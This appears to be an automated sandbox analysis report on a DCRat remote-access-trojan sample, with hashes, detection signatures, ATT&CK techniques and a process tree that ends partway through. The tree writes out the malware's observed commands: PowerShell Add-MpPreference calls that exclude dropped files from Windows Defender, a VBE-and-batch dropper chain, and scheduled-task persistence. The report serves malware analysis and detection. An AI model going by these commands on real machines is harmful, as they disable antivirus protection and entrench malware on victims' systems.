dcrat | 696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 18:24 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe
Size

1.3MB
MD5

f9645dfe7ffbebdb967ab819c9a67ff2
SHA1

05d7545b61059b738e87cc905fce6aa51941d18e
SHA256

696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44
SHA512

00b627b7b4e128d7f6bc8e73bf12a9f52a14621a43b3e742f64d9f0610034c3013b89e5f0b1e10c857a30afd94256bac0a14a4d11f40ecd2a2d331bfc8958ea9
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	508	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3744	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	756	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4796	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3728	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	3748	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2636	3748	schtasks.exe	90

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023c72-10.dat	dcrat
behavioral2/memory/4836-13-0x0000000000200000-0x0000000000310000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2156	powershell.exe
2212	powershell.exe
2116	powershell.exe
4808	powershell.exe
3020	powershell.exe
864	powershell.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe

Executes dropped EXE 16 IoCs

pid	Process
4836	DllCommonsvc.exe
1832	DllCommonsvc.exe
2584	DllCommonsvc.exe
1408	DllCommonsvc.exe
3756	DllCommonsvc.exe
536	DllCommonsvc.exe
3608	DllCommonsvc.exe
4984	DllCommonsvc.exe
4148	DllCommonsvc.exe
396	DllCommonsvc.exe
1140	DllCommonsvc.exe
4996	DllCommonsvc.exe
2404	DllCommonsvc.exe
3448	DllCommonsvc.exe
1424	DllCommonsvc.exe
3828	DllCommonsvc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
43	raw.githubusercontent.com
23	raw.githubusercontent.com
37	raw.githubusercontent.com
38	raw.githubusercontent.com
45	raw.githubusercontent.com
19	raw.githubusercontent.com
39	raw.githubusercontent.com
44	raw.githubusercontent.com
56	raw.githubusercontent.com
57	raw.githubusercontent.com
20	raw.githubusercontent.com
52	raw.githubusercontent.com
53	raw.githubusercontent.com
54	raw.githubusercontent.com
55	raw.githubusercontent.com

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\sihost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.371\66fc9ff0ee96c2	DllCommonsvc.exe
File created	C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Program Files\MSBuild\Microsoft\a76d7bf15d8370	DllCommonsvc.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Media\Garden\DllCommonsvc.exe	DllCommonsvc.exe
File created	C:\Windows\Media\Garden\a76d7bf15d8370	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	DllCommonsvc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4004	schtasks.exe
4784	schtasks.exe
508	schtasks.exe
2188	schtasks.exe
660	schtasks.exe
532	schtasks.exe
756	schtasks.exe
4796	schtasks.exe
1844	schtasks.exe
2484	schtasks.exe
2084	schtasks.exe
3744	schtasks.exe
3728	schtasks.exe
1628	schtasks.exe
2636	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4836	DllCommonsvc.exe
864	powershell.exe
4808	powershell.exe
2212	powershell.exe
2116	powershell.exe
2116	powershell.exe
3020	powershell.exe
3020	powershell.exe
2156	powershell.exe
864	powershell.exe
864	powershell.exe
4808	powershell.exe
4808	powershell.exe
2116	powershell.exe
2212	powershell.exe
3020	powershell.exe
2212	powershell.exe
2156	powershell.exe
2156	powershell.exe
1832	DllCommonsvc.exe
2584	DllCommonsvc.exe
1408	DllCommonsvc.exe
3756	DllCommonsvc.exe
536	DllCommonsvc.exe
3608	DllCommonsvc.exe
4984	DllCommonsvc.exe
4148	DllCommonsvc.exe
396	DllCommonsvc.exe
1140	DllCommonsvc.exe
4996	DllCommonsvc.exe
2404	DllCommonsvc.exe
3448	DllCommonsvc.exe
1424	DllCommonsvc.exe
3828	DllCommonsvc.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	4836	DllCommonsvc.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	1832	DllCommonsvc.exe
Token: SeDebugPrivilege	2584	DllCommonsvc.exe
Token: SeDebugPrivilege	1408	DllCommonsvc.exe
Token: SeDebugPrivilege	3756	DllCommonsvc.exe
Token: SeDebugPrivilege	536	DllCommonsvc.exe
Token: SeDebugPrivilege	3608	DllCommonsvc.exe
Token: SeDebugPrivilege	4984	DllCommonsvc.exe
Token: SeDebugPrivilege	4148	DllCommonsvc.exe
Token: SeDebugPrivilege	396	DllCommonsvc.exe
Token: SeDebugPrivilege	1140	DllCommonsvc.exe
Token: SeDebugPrivilege	4996	DllCommonsvc.exe
Token: SeDebugPrivilege	2404	DllCommonsvc.exe
Token: SeDebugPrivilege	3448	DllCommonsvc.exe
Token: SeDebugPrivilege	1424	DllCommonsvc.exe
Token: SeDebugPrivilege	3828	DllCommonsvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 3608	2272	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe	82
PID 2272 wrote to memory of 3608	2272	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe	82
PID 2272 wrote to memory of 3608	2272	JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe	82
PID 3608 wrote to memory of 2936	3608	WScript.exe	85
PID 3608 wrote to memory of 2936	3608	WScript.exe	85
PID 3608 wrote to memory of 2936	3608	WScript.exe	85
PID 2936 wrote to memory of 4836	2936	cmd.exe	87
PID 2936 wrote to memory of 4836	2936	cmd.exe	87
PID 4836 wrote to memory of 2156	4836	DllCommonsvc.exe	107
PID 4836 wrote to memory of 2156	4836	DllCommonsvc.exe	107
PID 4836 wrote to memory of 2212	4836	DllCommonsvc.exe	108
PID 4836 wrote to memory of 2212	4836	DllCommonsvc.exe	108
PID 4836 wrote to memory of 2116	4836	DllCommonsvc.exe	109
PID 4836 wrote to memory of 2116	4836	DllCommonsvc.exe	109
PID 4836 wrote to memory of 4808	4836	DllCommonsvc.exe	110
PID 4836 wrote to memory of 4808	4836	DllCommonsvc.exe	110
PID 4836 wrote to memory of 3020	4836	DllCommonsvc.exe	111
PID 4836 wrote to memory of 3020	4836	DllCommonsvc.exe	111
PID 4836 wrote to memory of 864	4836	DllCommonsvc.exe	112
PID 4836 wrote to memory of 864	4836	DllCommonsvc.exe	112
PID 4836 wrote to memory of 1152	4836	DllCommonsvc.exe	119
PID 4836 wrote to memory of 1152	4836	DllCommonsvc.exe	119
PID 1152 wrote to memory of 4220	1152	cmd.exe	121
PID 1152 wrote to memory of 4220	1152	cmd.exe	121
PID 1152 wrote to memory of 1832	1152	cmd.exe	126
PID 1152 wrote to memory of 1832	1152	cmd.exe	126
PID 1832 wrote to memory of 4764	1832	DllCommonsvc.exe	132
PID 1832 wrote to memory of 4764	1832	DllCommonsvc.exe	132
PID 4764 wrote to memory of 4924	4764	cmd.exe	134
PID 4764 wrote to memory of 4924	4764	cmd.exe	134
PID 4764 wrote to memory of 2584	4764	cmd.exe	136
PID 4764 wrote to memory of 2584	4764	cmd.exe	136
PID 2584 wrote to memory of 452	2584	DllCommonsvc.exe	138
PID 2584 wrote to memory of 452	2584	DllCommonsvc.exe	138
PID 452 wrote to memory of 2716	452	cmd.exe	140
PID 452 wrote to memory of 2716	452	cmd.exe	140
PID 452 wrote to memory of 1408	452	cmd.exe	144
PID 452 wrote to memory of 1408	452	cmd.exe	144
PID 1408 wrote to memory of 4416	1408	DllCommonsvc.exe	147
PID 1408 wrote to memory of 4416	1408	DllCommonsvc.exe	147
PID 4416 wrote to memory of 4680	4416	cmd.exe	149
PID 4416 wrote to memory of 4680	4416	cmd.exe	149
PID 4416 wrote to memory of 3756	4416	cmd.exe	151
PID 4416 wrote to memory of 3756	4416	cmd.exe	151
PID 3756 wrote to memory of 4128	3756	DllCommonsvc.exe	153
PID 3756 wrote to memory of 4128	3756	DllCommonsvc.exe	153
PID 4128 wrote to memory of 3432	4128	cmd.exe	155
PID 4128 wrote to memory of 3432	4128	cmd.exe	155
PID 4128 wrote to memory of 536	4128	cmd.exe	157
PID 4128 wrote to memory of 536	4128	cmd.exe	157
PID 536 wrote to memory of 4180	536	DllCommonsvc.exe	159
PID 536 wrote to memory of 4180	536	DllCommonsvc.exe	159
PID 4180 wrote to memory of 4996	4180	cmd.exe	161
PID 4180 wrote to memory of 4996	4180	cmd.exe	161
PID 4180 wrote to memory of 3608	4180	cmd.exe	163
PID 4180 wrote to memory of 3608	4180	cmd.exe	163
PID 3608 wrote to memory of 4820	3608	DllCommonsvc.exe	165
PID 3608 wrote to memory of 4820	3608	DllCommonsvc.exe	165
PID 4820 wrote to memory of 3108	4820	cmd.exe	167
PID 4820 wrote to memory of 3108	4820	cmd.exe	167
PID 4820 wrote to memory of 4984	4820	cmd.exe	169
PID 4820 wrote to memory of 4984	4820	cmd.exe	169
PID 4984 wrote to memory of 4536	4984	DllCommonsvc.exe	171
PID 4984 wrote to memory of 4536	4984	DllCommonsvc.exe	171

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_696223a14acff7b4532c1b22191ae0403feef3d5e13b1d68b4b8dc6a80867e44.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Garden\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Update\1.3.36.371\sihost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:864
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lOqaIh1y4I.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1152
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:4220
      - C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1832
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2RP5SY0RjS.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4764
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:4924
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Po3x2tXZG.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:2716
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1408
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:4416
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:4680
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OI2OM6vZgr.bat"
        13⤵
        Suspicious use of WriteProcessMemory
        
        PID:4128
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:3432
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:4180
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        16⤵
        
        PID:4996
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat"
        17⤵
        Suspicious use of WriteProcessMemory
        
        PID:4820
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:3108
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4NR89d4K3E.bat"
        19⤵
        
        PID:4536
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        20⤵
        
        PID:2504
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4148
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dk6czFnjgV.bat"
        21⤵
        
        PID:1480
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        22⤵
        
        PID:1588
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:396
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"
        23⤵
        
        PID:3756
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:1152
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\grdey4A1QM.bat"
        25⤵
        
        PID:3784
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:2188
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uZApDsIgYI.bat"
        27⤵
        
        PID:3712
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        28⤵
        
        PID:3624
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"
        29⤵
        
        PID:3344
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        30⤵
        
        PID:4292
        
        C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe
        
        "C:\Program Files\MSBuild\Microsoft\DllCommonsvc.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
